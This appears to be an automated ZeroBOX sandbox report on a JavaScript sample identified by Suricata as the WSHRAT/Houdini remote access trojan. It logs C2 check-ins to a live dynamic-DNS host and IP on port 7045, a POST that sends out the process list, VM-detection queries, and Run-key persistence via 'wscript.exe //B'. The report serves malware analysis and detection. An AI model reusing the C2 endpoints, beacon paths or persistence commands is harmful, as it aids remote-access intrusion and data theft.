Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 6, 2023, 10:11 a.m.	Oct. 6, 2023, 10:13 a.m.

Size	51.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`9c334d578b33e9df286d5973198f7344`
SHA256	`69719809516edaab200680b7689e6c0c6541c9245f300babb5ee0a17abd82220`
CRC32	`1C7A31FD`
ssdeep	`768:q/cV6RINgkf8ooAXwbaeThotRtkI5OF7gWOy8tnVyucD:q/wmINjf/HtkaisthtnNy`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\vc.js
2536
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\fGxgS.js"
  2664
  - wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
    2760

Name	Response	Post-Analysis Lookup
chongmei33.publicvm.com	A 103.47.144.38	103.47.144.38

IP Address	Status	Action
103.47.144.38	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2034457	ET POLICY Observed DNS Query to DynDNS Domain (publicvm .com)	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49189 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49189 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49189 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 103.47.144.38:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 103.47.144.38:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 103.47.144.38:7045	2017968	ET HUNTING Suspicious Possible Process Dump in POST body	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 103.47.144.38:7045	2027117	ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 103.47.144.38:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 6, 2023, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2023, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2023, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2023, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2023, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1

Connects to a Dynamic DNS Domain (1 event)

domain

chongmei33.publicvm.com

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 6, 2023, 10:11 a.m.	process_identifier: 2664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 6, 2023, 10:11 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1	0	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (22 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Oct. 6, 2023, 10:11 a.m.	number_of_free_clusters: 3252397 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:11 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:11 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:11 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252392 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 2520227 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252340 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252212 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:12 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252206 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252205 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 6, 2023, 10:13 a.m.	number_of_free_clusters: 3252205 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\fGxgS.js

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Wscript.exe initiated network communications indicative of a script based payload download (47 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetReadFile Oct. 6, 2023, 10:12 a.m.	buffer: get-processes request_handle: 0x00cc000c	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-processes flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-processes	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 6, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356

Installs itself for autorun at Windows startup (48 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
